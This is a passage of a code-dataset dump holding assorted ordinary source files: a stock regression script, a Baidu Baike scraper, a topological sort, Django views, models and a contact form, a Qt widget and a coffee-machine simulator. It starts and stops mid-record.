csv_data['^GSPC'].values.reshape(-1, 1)\n# Normalize the numerical values\nxScaler = StandardScaler()\nyScaler = StandardScaler()\nx = xScaler.fit_transform(x)\ny = 
yScaler.fit_transform(y)\nx = np.array(x[:-1])\ny = np.array(make_data(y))\n# split the data to train and test\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n# make model\nmodel = LinearRegression()\nmodel.fit(x_train, y_train)\n# make prediction\ny_pred = model.predict(x_test)\nprint(\"Test score:\", r2_score(y_test, y_pred))\n# show prediction\ny_pred = yScaler.inverse_transform(y_pred)\ny_test = yScaler.inverse_transform(y_test)\nprint (\"Pred\\n\", y_pred[:3])\nprint (\"Answ\\n\", y_test[:3])\n","sub_path":"ai_stock_1.py","file_name":"ai_stock_1.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"18085778","text":"#!/usr/bin/env python3\n\nimport os\n\ndef view_dir(path = '.'):\n \"\"\"\n 显示目标目录下的所有文件\n :param path:\n :return:\n \"\"\"\n names = os.listdir(path)\n names.sort()\n for name in names:\n print(name)\n\nprint(view_dir('/tmp'))","sub_path":"Python3/Modules/view_dir.py","file_name":"view_dir.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"473527639","text":"import bs4\nimport load_url as lurl\nimport re\nfrom multiprocessing import Pool\n# 这里输入都是load的data\ntmp = \"https://baike.baidu.com\" #拼接前缀\ndef get_relations(data):\n \"\"\"\n 解析的到relation关系\n :param data:\n :return: list\n \"\"\"\n # if data == None:\n # print('timeout:'+url)\n # return None\n res = []\n soup = bs4.BeautifulSoup(data, 'html.parser')\n tags = soup.find_all('ul', attrs={'class': 'slider maqueeCanvas'})\n for tag in tags:\n soup2 = bs4.BeautifulSoup(str(tag), 'html.parser')\n tag2 = soup2.find_all('div', attrs={'class': 'name'})\n if len(tag2) == 0:\n continue\n dict = {}\n for i in tag2:\n if not i.em:\n continue\n full = i.text\n name = i.em.text\n len1 = len(full)\n len2 = len(name)\n relations = full[0:len1 - len2]\n dict_tmp = {relations: name}\n res.append(dict_tmp)\n # print(relations)\n return res\n\ndef get_movieurl_old1(data):\n \"\"\"\n 解析得到movie——url列表\n :param data:\n :return: list\n \"\"\"\n url = []\n # if data == None:\n # print('timeout:'+star_url)\n # return None\n soup = bs4.BeautifulSoup(data, 'html.parser')\n # get_name = soup.find_all('dd', attrs={'class': 'lemmaWgt-lemmaTitle-title'})\n # if len(get_name) == 0:\n # # print(path1)\n # continue\n # main_name = get_name[0].h1.text\n # print(main_name)\n tags = soup.find_all('div', attrs={'class': 'star-info-block works'})\n # tags = soup.find_all('ul', attrs={'class':'slider maqueeCanvas'})\n\n for tag in tags:\n soup2 = bs4.BeautifulSoup(str(tag), 'html.parser')\n tag2 = soup2.find_all('ul', attrs={'class': 'slider maqueeCanvas'})\n if len(tag2) == 0:\n continue\n for i in tag2:\n soup3 = bs4.BeautifulSoup(str(i), 'html.parser')\n tag3 = soup3.find_all('a', attrs={'href': True})\n for j in tag3:\n name = j.text.strip('\\n')\n # print(name)\n item = j['href']\n # print(item)\n if item[0] != '/':\n movie_url = item\n else:\n movie_url = tmp + item\n # print(movie_url)\n url.append(movie_url)\n # 下载电影html\n # if name == '' or name == None:\n # continue\n # else:\n # data = test.load(movie_url)\n # test.write_html(main_name.replace('/', ' ') + '-' + name.replace('/', ' '), data)\n # n = n + 1\n # print(n)\n # print(url)\n return url\n\ndef get_movieurl(data):\n \"\"\"\n 更新规则,从代表总品的列表里获取\n :param data:\n :return:\n \"\"\"\n url = []\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n tag1 = 
soup1.find('dl',attrs={'class':'basicInfo-block basicInfo-right'})\n num = -1\n if not tag1:\n return None\n # else:\n soup2 = bs4.BeautifulSoup(str(tag1), 'html.parser')\n tags2 = soup2.find_all('dt', attrs={'class': 'basicInfo-item name'})\n tags3 = soup2.find_all('dd', attrs={'class': 'basicInfo-item value'})\n for tag2 in tags2:\n # print(tag2.text.strip('\\n'))\n if tag2.text != '代表作品' and num==len(tags2)-2:\n num=-1\n else:\n if tag2.text == '代表作品':\n # print('here')\n num=num+1\n break\n else:\n num=num+1\n if num != -1:\n mark = tags3[num]\n soup3 = bs4.BeautifulSoup(str(mark), 'html.parser')\n tags4 = soup3.find_all('a', attrs={'target':'_blank'})\n for tag4 in tags4:\n url_tmp = tag4['href']\n if url_tmp[0] == '/':\n movie_url = tmp + url_tmp\n elif url_tmp[1] == 'h':\n movie_url = url_tmp\n else:\n continue\n url.append(movie_url)\n else:\n return None\n return url\n\ndef get_showurl(data):\n \"\"\"\n 解析明星html得到show——url列表\n :param data: 明星的html数据\n :return: list\n \"\"\"\n res = []\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n tags1 = soup1.find_all('table', attrs={'class': 'cell-module'})\n if (len(tags1) == 0):\n return None\n tags1 = tags1[0]\n soup2 = bs4.BeautifulSoup(str(tags1), 'html.parser')\n tags2 = soup2.find_all('a', attrs={'href': True})\n if (len(tags2) == 0):\n return None\n for tag2 in tags2:\n # 每个循环一个url(一个show记录),解析并添加到relation_set\n show_name = tag2.text.strip('\\n')\n url = tag2['href']\n if url[0] == '/':\n show_url = tmp + url\n elif url[1] == 'h':\n show_url = url\n else:\n continue\n res.append(show_url)\n return res\n\n\n# get_movie\ndef analysis_movieurl(url,movie_path, file_name):\n \"\"\"\n 接卸movie——url并且写html文件\n :param url: movie的url\n :param movie_path: 写html的路径\n :param file_name: html的文件名\n :return: set\n \"\"\"\n relation = set()\n data = lurl.load(url)\n if data == None:\n print('timeout:'+url)\n with open('log','a',encoding='utf-8') as f:\n f.write('movie_url load 失败:' + str(file_name) + '>----->' + url + '\\n')\n return None\n lurl.write_html(file_name, data, movie_path)\n # p.apply_async(lurl.write_html, args = (file_name,data,movie_path))\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n tag1 = soup1.find('div',attrs={'class':'basic-info cmn-clearfix'})\n num=-1\n if not tag1:\n return None\n # else:\n soup2 = bs4.BeautifulSoup(str(tag1), 'html.parser')\n tags2 = soup2.find_all('dt',attrs={'class':'basicInfo-item name'})\n tags3 = soup2.find_all('dd',attrs={'class':'basicInfo-item value'})\n\n for tag2 in tags2:\n # print(tag2.text.strip('\\n'))\n if tag2.text != '主    演' and num==len(tags2)-2:\n num=-1\n else:\n if tag2.text == '主    演':\n # print('here')\n num=num+1\n break\n else:\n num=num+1\n # print(num)\n if num!=-1:\n zhuyan = tags3[num]\n else:\n return None\n list = re.split(r'[,、]', zhuyan.text.strip('\\n'))\n # print(list)\n # print(type(list))\n for i in range(len(list)):\n list[i] = re.sub('[\\[\\d\\]\\n\\xa0]|[\\((][^\\))]+[\\))]$', '', list[i])\n # list[i]=list[i].rstrip('\\n').rstrip('[').rstrip('(')\n relation = set(list)\n return relation\n\n# get_show\ndef analysis_showurl(url, show_path, file_name):\n \"\"\"\n 解析showurl并写html\n :param url: 要解析的url\n :param show_path: 写html的路径\n :param file_name: 写html的文件名\n :return: set\n \"\"\"\n # p = Pool(1)\n data = lurl.load(url)\n if data == None:\n print('timeout:'+url)\n with open('log','a',encoding='utf-8') as f:\n f.write('show_url load 失败:' + str(file_name) + '>----->' + url + '\\n')\n return None\n # lurl.write_html(file_name, data, show_path)\n # 
p.apply_async(lurl.write_html,args=(file_name,data,show_path))\n soup1 = bs4.BeautifulSoup(data, 'html.parser')\n # print(soup1)\n tag1 = soup1.find('dl', attrs={'class': 'basicInfo-block basicInfo-left'})\n # tag1 = soup1.find('div', attrs={'class': 'basic-info cmn-clearfix'})\n if not tag1:\n return None\n relation = set()\n num = -1\n soup2 = bs4.BeautifulSoup(str(tag1), 'html.parser')\n tags2 = soup2.find_all('dt', attrs={'class': True})\n # print(tags2)\n tags3 = soup2.find_all('dd', attrs={'class': True})\n # print(tags3)\n for tag2 in tags2:\n if tag2.text.strip('\\n') != '主持人' and num == len(tags2) - 2:\n num = -1\n else:\n if tag2.text.strip('\\n') == '主持人':\n num = num + 1\n break\n else:\n num = num + 1\n # print(num)\n # print(num)\n if num != -1:\n zhuchiren = tags3[num]\n # print(zhuchiren)\n else:\n return None\n list = re.split(r'[,、]', zhuchiren.text.strip('\\n'))\n # print(list)\n # print(type(list))\n for i in range(len(list)):\n list[i] = re.sub('[\\[\\d\\]\\n\\xa0]|[\\((][^\\))]+[\\))]$', '', list[i])\n # list[i]=list[i].rstrip('\\n').rstrip('[').rstrip('(')\n # relation = set(list)\n relation = set(list)\n return relation","sub_path":"recommend_baike_system/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":8638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"578504219","text":"#Jonathan Nunes\r\n#CS 435\r\n#Project 2 Part 2\r\n#Top Sort Class\r\n\r\nclass TopSort:\r\n\r\n def kahns(self, graph):\r\n \"\"\"Does a valid topological sort of the graph using Kahn's algorithm.\"\"\"\r\n dependencies = [0] * len(graph.nodes)\r\n for node in graph.nodes:\r\n for adj in graph.adjacency[node][1:]:\r\n dependencies[adj] += 1\r\n\r\n ret = []\r\n queue = []\r\n for node in graph.nodes:\r\n if dependencies[node] == 0:\r\n queue.append(node)\r\n\r\n while queue:\r\n\r\n temp = queue.pop(0)\r\n ret.append(temp)\r\n\r\n for node in graph.adjacency[temp]:\r\n dependencies[node] -= 1\r\n\r\n if dependencies[node] == 0:\r\n queue.append(node)\r\n\r\n return ret\r\n\r\n def mDFS(self, graph):\r\n \"\"\"Does a valid topological sort of the graph using mDFS algorithm.\"\"\"\r\n stack = []\r\n visited = [False] * len(graph.nodes)\r\n\r\n for node in graph.nodes:\r\n if visited[node] == False:\r\n self.mDFSHelper(graph, node, visited, stack)\r\n \r\n return stack\r\n\r\n def mDFSHelper(self, graph, node, visited, stack):\r\n \"\"\"Helper function for the mDFS function.\"\"\"\r\n visited[node] = True\r\n\r\n for neighbor in graph.adjacency[node]:\r\n if visited[neighbor] == False:\r\n self.mDFSHelper(graph, neighbor, visited, stack)\r\n \r\n stack.append(node)\r\n","sub_path":"project2 revised/TopSort.py","file_name":"TopSort.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"347986248","text":"# -*- coding: utf-8 -*-\nfrom annoying.decorators import render_to\nfrom cms.utils import get_language_from_request, get_page_from_request\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\nfrom library.models import Person\n\ndef get_category_from_request(request, use_session=True):\n \"\"\"Get category for post at current cms page\n \"\"\"\n try:\n key = request.session.get('referer', 'page_path')\n if use_session:\n request.path = request.session[key]\n page = get_page_from_request(request)\n except KeyError:\n raise Http404('You are behind django-cms')\n 
language = get_language_from_request(request)\n cms_category_plugins = page.cmsplugin_set.filter(\n Q(language=language) &\n Q(plugin_type__exact='PersonListOnPagePlugin')\n )\n if not cms_category_plugins.count():\n raise Http404('Category not found')\n return cms_category_plugins[0].personsincategory.category\n\n\n@render_to()\ndef show(request, pk, person_slug):\n request.session['page_path'] = request.path\n category = get_category_from_request(request)\n person = get_object_or_404(Person, pk=pk, slug=person_slug)\n persons = Person.objects.filter(category__in = person.category.all()).distinct()\n tags = [t.strip() for t in person.tags.split(',') if t.strip() ]\n return {\n 'category': category,\n 'person' : person,\n 'persons' : persons.exclude(pk = person.pk),\n 'persons_with_current': persons,\n 'view_title': person.name,\n 'tags': tags,\n 'TEMPLATE': category.template,\n }\n","sub_path":"library/views/persons.py","file_name":"persons.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"20909072","text":"# coding: utf-8\n__author__ = 'PlayJokes'\nimport database\nimport text_file\n\nclass SentenceManager:\n def __init__(self, form):\n if form == 'database':\n self.container = database.DataBase()\n elif form == 'text':\n self.container = text_file.TextFile('./words.data')\n\n def insertSentence(self, sentence, author, source):\n self.container.insertSentence(sentence, author, source)\n","sub_path":"tools/spider/sentence_manager.py","file_name":"sentence_manager.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"631934334","text":"from . import QtCore, QtWidgets\nimport six\nif six.PY3:\n unicode = str\n\n\nclass LocationWidget(QtWidgets.QLineEdit):\n \"\"\"The widget with page location.\n\n It has its own completer that tries to work similarly to Sublime Text fuzzy search.\n Otherwise, it is based on standard line edit.\n \"\"\"\n\n class Completer(QtWidgets.QCompleter):\n def __init__(self, storage):\n super(LocationWidget.Completer, self).__init__()\n self.storage = storage\n self.setModel(QtCore.QStringListModel())\n\n def splitPath(self, path):\n if len(str(path)) > 2:\n self.model().setStringList(self.storage.fuzzy_find_names(unicode(path)))\n else:\n self.model().setStringList([])\n return [\"\"]\n\n def __init__(self, storage, parent=None):\n super(LocationWidget, self).__init__(parent)\n self.completer = LocationWidget.Completer(storage)\n self.setCompleter(self.completer)\n","sub_path":"hlava/qtui/location_widget.py","file_name":"location_widget.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"319484962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/4 12:56 AM\n# @Author : zhongch4g\n# @Site : \n# @File : 639. 
Word Abbreviation.py\n# @Software: IntelliJ IDEA\n\n\nclass Solution:\n \"\"\"\n @param dict: an array of n distinct non-empty strings\n @return: an array of minimal possible abbreviations for every word\n \"\"\"\n def wordsAbbreviation(self, dict):\n ans = [0] * len(dict)\n abbr = {}\n round = 1\n for i in range(len(dict)):\n ans[i] = self.get_abbr(dict[i], round)\n abbr[ans[i]] = abbr.get(ans[i], 0) + 1\n\n\n while True:\n unique = True\n round += 1\n for i in range(len(dict)):\n if abbr[ans[i]] > 1:\n ans[i] = self.get_abbr(dict[i], round)\n abbr[ans[i]] = abbr.get(ans[i], 0) + 1\n unique = False\n if unique:\n break\n return ans\n\n\n def get_abbr(self, word, pre):\n if pre + 2 >= len(word):\n return word\n\n return word[:pre] + str(len(word) - pre - 1) + word[-1]\n","sub_path":"Lintcode/639. Word Abbreviation.py","file_name":"639. Word Abbreviation.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"366989891","text":"from django.contrib.admin.widgets import AdminFileWidget\nfrom django.utils.translation import ugettext as _\nfrom django.utils.safestring import mark_safe\nfrom django import forms\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.contrib.sites.models import Site\nfrom django.template.defaultfilters import slugify\nfrom django.conf import settings\nfrom simplemathcaptcha.fields import MathCaptchaField\n\nfrom .models import ContactPlus\n\nfrom .signals import *\n\nclass ContactFormPlus(forms.Form):\n \n def __init__(self, contactFormInstance, request, *args, **kwargs):\n super(ContactFormPlus, self).__init__(*args, **kwargs)\n if 'instance' not in kwargs:\n for extraField in contactFormInstance.extrafield_set.all():\n if extraField.fieldType == 'CharField':\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'BooleanField':\n self.fields[slugify(extraField.label)] = forms.BooleanField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'EmailField':\n self.fields[slugify(extraField.label)] = forms.EmailField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'DecimalField':\n self.fields[slugify(extraField.label)] = forms.DecimalField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'FloatField':\n self.fields[slugify(extraField.label)] = forms.FloatField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'IntegerField':\n self.fields[slugify(extraField.label)] = forms.IntegerField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'IPAddressField':\n self.fields[slugify(extraField.label)] = forms.IPAddressField(label=extraField.label, \n initial=extraField.initial, \n required=extraField.required)\n elif extraField.fieldType == 'auto_Textarea':\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial=extraField.initial,\n widget=forms.Textarea, \n required=extraField.required)\n elif extraField.fieldType == 'auto_hidden_input':\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial 
= extraField.initial,\n widget=forms.HiddenInput, \n required=False)\n elif extraField.fieldType == 'auto_referral_page':\n lInitial = \"No referral available.\"\n if request:\n lInitial = request.META.get('HTTP_REFERER', 'No referral available.')\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial = lInitial, #NOTE: This overwrites extraField.initial! \n widget=forms.HiddenInput, \n required=False) \n elif extraField.fieldType == 'MathCaptcha':\n self.fields[slugify(extraField.label)] = MathCaptchaField(\n label=extraField.label,\n initial = extraField.initial,\n required=True) \n elif extraField.fieldType == 'auto_GET_parameter':\n lInitial = \"Key/value parameter not available.\"\n if request:\n lInitial = request.GET.get(slugify(extraField.label), 'n/a')\n self.fields[slugify(extraField.label)] = forms.CharField(label=extraField.label, \n initial = lInitial, #NOTE: This overwrites extraField.initial! \n widget=forms.HiddenInput, \n required=False)\n \n \n \n def send(self, recipient_email, request, instance=None):\n current_site = Site.objects.get_current()\n if instance:\n order = ContactPlus.objects.get(id=instance.id).extrafield_set.order_by('inline_ordering_position')\n ordered_dic_list = []\n\n for field in order:\n key = slugify(field.label)\n value = self.cleaned_data.get(key, '(no input)')\n ordered_dic_list.append({field.label: value})\n \n \n # Automatically match reply-to email adress in form \n tmp_headers = {}\n try:\n reply_email_label = getattr(settings, 'CONTACT_PLUS_REPLY_EMAIL_LABEL', None)\n if reply_email_label is not None:\n tmp_headers.update({'Reply-To': self.cleaned_data[reply_email_label]})\n except:\n pass\n \n email_message = EmailMessage(\n \"[\" + current_site.domain.upper() + \"]\",\n render_to_string(\"cmsplugin_contact_plus/email.txt\", { 'data': self.cleaned_data, \n 'ordered_data': ordered_dic_list,\n 'instance': instance,\n }),\n from_email = getattr(settings, 'DEFAULT_FROM_EMAIL', None),\n to = [recipient_email, ],\n headers = tmp_headers,)\n email_message.send(fail_silently=True)\n \n contact_message_sent.send(sender=self, data=self.cleaned_data)\n \n","sub_path":"cmsplugin_contact_plus/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"361857265","text":"from threading import Thread\nfrom queue import Queue, Empty\nfrom functools import partial\nfrom time import sleep, perf_counter\n\nclass SenseoSimulator():\n def __init__(self, status_change_callback):\n self.machine_thread = MachineThread(self.status_change_callback)\n self.machine_thread.start()\n\n self.ordered_cups = 0\n\n # The function to call when the state of the machine changes\n self.status_change_callback = status_change_callback\n\n self.wait_time = 0.1\n\n def send_status(self):\n self.status_change_callback({\n \"state\": self.machine_thread.state,\n \"ordered_cups\": self.ordered_cups,\n \"led\": self.machine_thread.led\n })\n\n def status_change_callback(self):\n if self.ordered_cups > 0 and self.machine_thread.state == \"ready\":\n sleep(self.wait_time)\n self.try_brew()\n self.ordered_cups = 0\n\n self.send_status()\n\n def turn_on(self):\n if self.machine_thread.state == \"off\":\n self.machine_thread.commands.put(\"power\")\n self.ordered_cups = 0\n\n def turn_off(self):\n if self.machine_thread.state != \"off\":\n self.machine_thread.commands.put(\"power\")\n self.ordered_cups = 0\n\n def stop(self):\n if 
self.machine_thread.state in (\"brewing\", \"heating\"):\n self.ordered_cups = 0\n if self.machine_thread.state == \"brewing\":\n # Have you tried turning it off and on again?\n self.machine_thread.commands.put(\"power\")\n sleep(self.wait_time)\n self.machine_thread.commands.put(\"power\")\n\n def brew_one(self):\n self.ordered_cups = 1\n self.try_brew()\n\n def brew_two(self):\n self.ordered_cups = 2\n self.try_brew()\n\n def try_brew(self):\n if self.machine_thread.state == \"off\":\n self.machine_thread.commands.put(\"power\")\n elif self.machine_thread.state == \"ready\":\n self.machine_thread.commands.put(\"brew_\" + (\"one\" if self.ordered_cups == 1 else \"two\"))\n\n\nclass MachineThread(Thread):\n def __init__(self, status_change_callback):\n super().__init__()\n self.state = \"off\"\n self.temperature = 0\n self.remaining_brew_time = 0\n self.led = False\n self.remaining_led_blink_time = 0\n\n self.heat_rate = 0.1\n self.off_cool_rate = 0.05\n self.brew_rate = 0.1\n self.brew_cool_rate = 0.05\n self.led_blink_period = 0.5\n self.sleep_time = 0.1\n\n self.status_change_callback = status_change_callback\n self.commands = Queue()\n self.handlers = {\n \"power\": self.power,\n \"brew_one\": partial(self.brew, 1),\n \"brew_two\": partial(self.brew, 2)\n }\n\n def run(self):\n last_time = perf_counter()\n while True:\n try:\n command = self.commands.get(block=True, timeout=self.sleep_time)\n self.handlers[command]()\n except Empty:\n pass\n current_time = perf_counter()\n dt = current_time - last_time\n last_time = current_time\n self.update(dt)\n\n def power(self):\n if self.state == \"off\":\n self.state = \"heating\"\n self.led = True\n self.status_change_callback()\n else:\n self.state = \"off\"\n self.remaining_brew_time = 0\n self.led = False\n self.status_change_callback()\n\n def brew(self, quantity):\n if self.state == \"ready\":\n self.state = \"brewing\"\n self.remaining_brew_time = quantity\n self.status_change_callback()\n\n def update(self, dt):\n if self.state in (\"heating\", \"brewing\") and self.remaining_led_blink_time <= 0:\n self.led = not self.led\n self.remaining_led_blink_time = self.led_blink_period\n self.status_change_callback()\n\n if self.state == \"heating\":\n self.temperature += dt * self.heat_rate\n self.remaining_led_blink_time -= dt\n\n if self.temperature >= 1:\n self.state = \"ready\"\n self.led = True\n self.status_change_callback()\n\n elif self.state == \"brewing\":\n self.remaining_brew_time -= dt * self.brew_rate\n self.temperature -= dt * self.brew_cool_rate\n\n if self.remaining_brew_time <= 0:\n self.state = \"heating\"\n self.status_change_callback()\n\n elif self.state == \"off\":\n self.temperature -= dt * self.off_cool_rate\n self.temperature = max(0, self.temperature)\n","sub_path":"backend/SenseoSimulator.py","file_name":"SenseoSimulator.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"561715561","text":"#!/usr/bin/env python\n\nimport csv\n\nwith open('data/knights.csv') as knights_in:\n\n # Create CSV reader\n rdr = csv.reader(knights_in)\n\n # Read and unpack records one at a time; each record is a list\n for name, title, color, quest, comment, number, ladies in rdr:\n print('{:4s} {:9s} {}'.format(\n title, name, quest\n ))\n","sub_path":"serializing_data/csv_read.py","file_name":"csv_read.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} 
+{"seq_id":"529281433","text":"import sqlite3\nfrom django.urls import reverse\nfrom django.shortcuts import redirect, render\nfrom ..connection import Connection\nfrom breadapp.models import Bread, model_factory\n\ndef bread_list(request):\n if request.method == \"GET\":\n '''connect to data base and grab the entire list of breads then doa fetch all and send those breads tot he html page'''\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = model_factory(Bread)\n\n db_cursor = conn.cursor()\n \n db_cursor.execute(\"\"\"\n Select * from breadapp_bread\n \"\"\")\n\n breads = db_cursor.fetchall()\n\n template = \"bread/bread_list.html\"\n context = {\n 'breads': breads\n }\n\n return render(request, template, context)\n if request.method == \"POST\":\n ''' check that it is a post method and then add the bread to the breadapp_bread table, afterwards get all the breads again!!!!'''\n form_data = request.POST\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = model_factory(Bread)\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n INSERT into breadapp_bread (name, region)\n values (?, ?)\n \"\"\", (form_data[\"name\"], form_data[\"region\"]))\n \n return redirect(reverse('breadapp:breads'))\n\n","sub_path":"breadapp/views/bread/bread_list.py","file_name":"bread_list.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"364652270","text":"#! Python3\r\n\r\nfrom jinja2 import Environment, FileSystemLoader\r\nimport docx\r\nimport os, sys, openpyxl, pprint, random\r\nfrom openpyxl.styles import Font, PatternFill, Border, Side\r\nfrom time import strftime\r\nfrom openpyxl.chart import (\r\n Reference,\r\n Series,\r\n BarChart3D,\r\n BarChart\r\n )\r\n\r\n''' Column Headers from EZPlan Output file\r\nPI ID & Title: Col 4,\r\nActivity ID: Col 5,\r\nPI ID: Col 6,\r\nTK ID: Col 7,\r\nWork Type: Col 8,\r\nCrop: Col 13,\r\nPlanned SD: Col 16,\r\nAllocated SD: Col 17,\r\nPlanned $: Col 20,\r\nAllocated $: Col 21,\r\nNamed Resource: Col 22,\r\nActivity Comments: Col 23,\r\nPortfolio: Col 24\r\n'''\r\n\r\ndef color():\r\n hecks = \"ABCDEF0123456789\"\r\n randomColor = \"\"\r\n for i in range(0, 6):\r\n randomColor += (hecks[random.randint(0, len(hecks)-1)])\r\n return randomColor\r\nrColor = color()\r\n\r\nPATH = os.path.dirname(os.path.abspath(__file__))\r\nTEMPLATE_ENVIRONMENT = Environment(\r\n autoescape=False,\r\n loader=FileSystemLoader(os.path.join(PATH, 'templates')),\r\n trim_blocks=False)\r\n\r\ndef render_template(template_file, context):\r\n return TEMPLATE_ENVIRONMENT.get_template('index.html').render(context)\r\n\r\ndoc = docx.Document('demo.docx')\r\nsentence = []\r\nfor i in range(0, len(doc.paragraphs)-1):\r\n sentence.append(doc.paragraphs[i].text)\r\n\r\ndef create_index_html():\r\n fname = \"output.html\"\r\n title = sys.argv[1]\r\n urls = ['http://example.com/1', 'http://example.com/2', 'http://example.com/3']\r\n text = ['hello', 'world']\r\n apples = {\r\n 'red': 'sweet',\r\n 'green': 'bitter'\r\n }\r\n context = {\r\n 'links':urls,\r\n 'text':text,\r\n 'dict': apples,\r\n 'sentence': sentence,\r\n 'title': title,\r\n 'color': rColor\r\n }\r\n #\r\n with open(fname, 'w') as f:\r\n html = render_template('index.html', context)\r\n f.write(html)\r\n\r\n\r\ndef main():\r\n create_index_html()\r\n\r\n######\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n 
\r\n","sub_path":"proba.py","file_name":"proba.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"73804444","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass Place(models.Model):\n _NONDISPLAYABLE = ['id', 'image', 'slug', 'latitude', 'longitude']\n _NONSEARfrCHABLE = ['street', 'building', 'description']\n _THUMBNAIL = ['price', 'street', 'building', 'city', 'type']\n _SLIDERS = ['price', 'rooms', 'total_footage', 'living_footage', 'floor_number']\n _CHECKBOXES = ['city', 'region', 'planning', 'wall_type', 'type']\n\n city = models.CharField(max_length=75, verbose_name=\"Город\", blank=True, null=True)\n street = models.CharField(max_length=75, verbose_name=\"Улица\", blank=True, null=True)\n building = models.CharField(max_length=75, verbose_name=\"Дом\", blank=True, null=True)\n region = models.CharField(max_length=75, verbose_name=\"Район\", blank=True, null=True)\n\n rooms = models.IntegerField(verbose_name=\"Количество комнат\", blank=True, null=True)\n total_footage = models.IntegerField(verbose_name=\"Общая площадь\", blank=True, null=True)\n living_footage = models.IntegerField(verbose_name=\"Жилая площадь\", blank=True, null=True)\n floor_number = models.IntegerField(verbose_name=\"Этаж\", blank=True, null=True)\n planning = models.CharField(max_length=75, verbose_name=\"Планировка\", blank=True, null=True)\n wall_type = models.CharField(max_length=75, verbose_name=\"Тип стен\", blank=True, null=True)\n price = models.IntegerField(verbose_name=\"Цена\", blank=True, null=True)\n\n # House or apartment\n type = models.CharField(max_length=75, verbose_name=\"Тип\")\n\n ## image = models.ImageField(upload_to='rentsite/', verbose_name=\"Изображение\", blank=True, null=True)\n slug = models.SlugField(unique=True)\n description = models.TextField(max_length=1000, verbose_name=\"Описание\", blank=True, null=True)\n\n # Coords for ympas\n latitude = models.FloatField(verbose_name=\"Широта\", blank=True, null=True)\n longitude = models.FloatField(verbose_name=\"Долгота\", blank=True, null=True)\n\n def __str__(self):\n return self.slug\n\n def get_thumbnail_fields_list(self):\n answer = list()\n for field in Place._meta.fields:\n if field.name in Place._THUMBNAIL:\n answer.append((field.name, field.value_to_string(self)))\n\n return answer\n\n def get_verbose_fields_list(self):\n answer = list()\n for field in Place._meta.fields:\n if field.name not in Place._NONDISPLAYABLE:\n answer.append((field.verbose_name, field.value_to_string(self)))\n\n return answer\n\n def get_coords(self):\n answer = dict()\n\n answer['latitude'] = self.latitude\n answer['longitude'] = self.longitude\n return answer\n\n def lies_into_polygon(self, polygon):\n x = self.longitude\n y = self.latitude\n\n if x is None:\n return False\n\n n = len(polygon)\n inside = False\n\n p1x,p1y = polygon[0]\n for i in range(n+1):\n p2x,p2y = polygon[i % n]\n if y > min(p1y,p2y):\n if y <= max(p1y,p2y):\n if x <= max(p1x,p2x):\n if p1y != p2y:\n xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x\n if p1x == p2x or x <= xints:\n inside = not inside\n p1x,p1y = p2x,p2y\n\n return inside\n\n\n\n\n\n @staticmethod\n def get_search_checkboxes():\n answer = dict()\n for field in Place._meta.fields:\n if field.name in Place._CHECKBOXES:\n answer[field.name] = field.verbose_name, list(set([x[field.name] for x in Place.objects.values(field.name)]))\n\n return answer\n\n @staticmethod\n 
